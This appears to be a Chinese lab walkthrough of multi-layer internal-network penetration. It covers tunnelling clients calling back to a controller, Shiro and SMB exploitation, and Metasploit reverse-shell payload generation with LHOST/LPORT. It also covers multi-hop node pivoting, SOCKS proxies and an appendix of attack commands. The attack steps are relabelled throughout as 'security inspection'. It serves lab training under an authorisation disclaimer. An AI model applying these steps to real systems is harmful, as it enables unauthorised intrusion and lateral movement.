安全免责声明:本文所有操作步骤仅限在已获授权的测试环境中进行,严禁用于任何未授权系统。作者不对任何非法使用本文内容的行为负责,请读者务必遵守相关法律法规。
第一部分:内网安全防护基础
阶段一:环境准备
步骤1:准备安全测试环境
在搭建内网安全测试环境时,需要准备必要的安全检测工具和防护软件,并将其部署到测试主机上。
步骤2:启动安全监控服务端
在安全监控主机上启动监控服务端程序,启动完成后保持该终端开启,用于收集和分析内网流量。
步骤3:为安全检测工具配置执行权限
在测试主机上,为安全检测工具程序配置执行权限:
chmod +x security_tool
步骤4:配置安全监控服务端
在安全监控服务端管理界面中进行相关配置,包括监控连接名称、隧道类型等参数的设置。
阶段二:安全通道建立
步骤5:在目标机运行安全客户端
在已授权的测试主机上,执行安全客户端连接命令,将目标机与安全监控服务端建立加密连接:
./client -server=192.168.196.145:8024 -vkey=your_key -type=tcp
阶段三:安全监控与代理配置
步骤6:接入安全监控平台并配置代理
完成安全通道连接后,第一层访问权限已建立。此时接入安全监控平台,并配置代理以访问内网进行安全巡检。
阶段四:内网安全巡检
步骤7:对内网进行安全巡检
将当前会话挂到后台(bg命令),新建一个shell窗口进行内网安全巡检。
步骤8:发现目标主机
巡检发现目标主机 10.10.135.35,对其进一步进行安全评估。
阶段五:SMB服务安全评估
步骤9:识别目标系统与服务
安全评估发现目标运行的是 Windows 6.1 系统(注意:Windows官方并无6.1版本编号,此为扫描工具识别结果),同时发现445端口开放,通常运行SMB服务。
步骤10:检查弱口令风险
利用扫描到的信息检查SMB服务是否存在弱口令风险,发现存在弱口令账户,需及时整改。
步骤11:验证连接
尝试连接发现无法成功登录(可能是假会话或网络隔离)。
步骤12:SMB匿名访问检查
尝试使用SMB匿名登录进行信息收集,评估是否存在匿名访问风险。
步骤13:修改代理端口号
调整代理端口配置,确保后续工具能正确通过代理访问内网目标。
步骤14:获取目标版本号
通过枚举手段获取目标SMB服务的详细版本号。
步骤15:查询版本漏洞信息
将获取到的版本号查询漏洞数据库(可借助AI工具辅助分析),确定需要修复的安全漏洞。
阶段六:SMB漏洞验证与修复
步骤16:使用安全检测模块验证漏洞
根据查询到的漏洞信息,在安全监控平台中选择对应的检测模块验证漏洞是否存在。
步骤17:配置代理后成功验证
未设置代理时无法连接到内网目标。配置好代理参数后重新执行检测,成功确认目标存在安全风险。
步骤18:Shell升级
获取的shell功能较为基础,按照提示添加参数进行升级,获得更完整的交互式shell。
步骤19:重命名会话
对升级后的session进行重命名,便于后续多会话管理。
阶段七:安全工具部署与端口转发
步骤20:进入session部署安全工具
进入目标shell,部署必要的安全检测工具(如fscan、安全客户端等)到目标主机。
步骤21:给工具添加执行权限
部署完成后,给工具文件添加执行权限。
步骤22:配置端口转发
回到session1(Shiro会话),配置端口转发,使SMB上的安全检测程序能回连到安全监控主机。
【提示】注意:这里的目的让SMB上的安全检测程序能回连到安全监控主机。实际上SMB已经接入监控,此步骤是为了将安全巡检流程走完整。
阶段八:安全检测程序部署与二次接入
步骤23:生成安全检测程序
利用安全工具生成安全检测程序文件。注意:IP和端口必须填写Shiro的IP和端口,与安全通道配置保持一致。
tool -p <payload> LHOST=<Shiro_IP> LPORT=<端口> -f <格式> > <文件名>
步骤24:运行检测程序获取新SMB会话
在目标主机上运行生成的安全检测程序,会新接入一个SMB会话。
步骤25:验证新会话
验证新接入的SMB会话与之前的session功能一致,确认安全巡检链路正常。
阶段九:最终代理配置与内网巡检
步骤26:配置最终代理
完成前述步骤后,进行最后的代理配置,确保能从安全监控主机访问内网所有服务。
第二部分:多层内网安全巡检
阶段十:重启环境重新巡检
步骤27:重启虚拟机
由于网络中断等原因导致巡检环境异常时,可重启虚拟机从头重新巡检。
步骤28:公式化接入Shiro
按照之前的流程,重新通过Shiro漏洞利用获取目标权限。
阶段十一:安全监控服务端启动
步骤29:启动安全监控服务端
在安全监控主机上启动监控服务端程序,监听指定端口:
./admin -l 1111 -s your_key
步骤30:在Shiro上运行客户端
在已获取权限的Shiro目标机上运行安全客户端程序,连接安全监控服务端:
./node -c 192.168.196.180:1111 -s your_key
阶段十二:节点连接与SOCKS代理
步骤31:在node0上开启SOCKS代理
在已连接的node0节点上开启SOCKS代理功能,将内网流量转发到安全监控主机。
步骤32:配置端口
配置代理端口参数,确保与本地代理设置一致。
阶段十三:验证连接与SMB接入
步骤33:尝试连接8080端口
通过已配置的代理,尝试连接之前扫描到的8080端口,验证内网巡检是否生效。
步骤34:连接成功验证
能够成功连接到8080端口,说明多层内网巡检配置成功。
步骤35:接入SMB
利用巡检链路,将SMB服务也接入到安全监控平台中。
步骤36:在node0上开启监听
在node0节点上开启监听端口,等待安全检测程序回连。
步骤37:上传node到SMB
将node程序上传到SMB目标主机。
步骤38:给node添加执行权限
给上传的node程序添加执行权限。
步骤39:运行node连接监听端口
在SMB目标机上运行node程序,连接node0上的监听端口,建立新的巡检节点。
步骤40:node1接入
新的node1节点成功接入,表示多层巡检链路已打通。
阶段十四:最终验证
步骤41:在node1上开启SOCKS代理
在node1节点上开启SOCKS代理,通过第二层巡检访问更深层的内网服务。
步骤42:修改端口配置并连接
修改代理配置文件中的端口号,再次尝试连接目标服务。
步骤43:巡检成功验证
能够成功连接,说明通过安全监控工具实现的多层内网巡检实验成功完成。
附录:常用命令速查
操作场景 | 命令/操作 |
安全客户端连接 | ./client -server=<服务器IP>:8024 -vkey=<密钥> -type=tcp |
安全监控服务端启动 | ./admin -l <端口> -s <密钥> |
安全客户端连接 | ./node -c <服务端IP>:<端口> -s <密钥> |
安全检测程序生成 | tool -p <payload> LHOST=<IP> LPORT=<端口> -f <格式> > <文件名> |
安全监控平台监听 | console > use exploit/multi/handler > set PAYLOAD > set LHOST > set LPORT > exploit |
上传文件(wget) | wget http://<监控主机IP>:<端口>/<文件名> |
查看文件 | ls -la |
验证完整性 | md5sum <文件名> |
添加执行权限 | chmod +x <文件名> |
fscan内网安全巡检 | ./fscan -h <网段> |
SMB匿名访问检查 | smbclient //IP/share -N |
安全监控会话管理 | sessions -l(列表)> sessions <ID>(进入)> shell(交互) |
安全路由添加 | run autoroute -s <网段>/24 |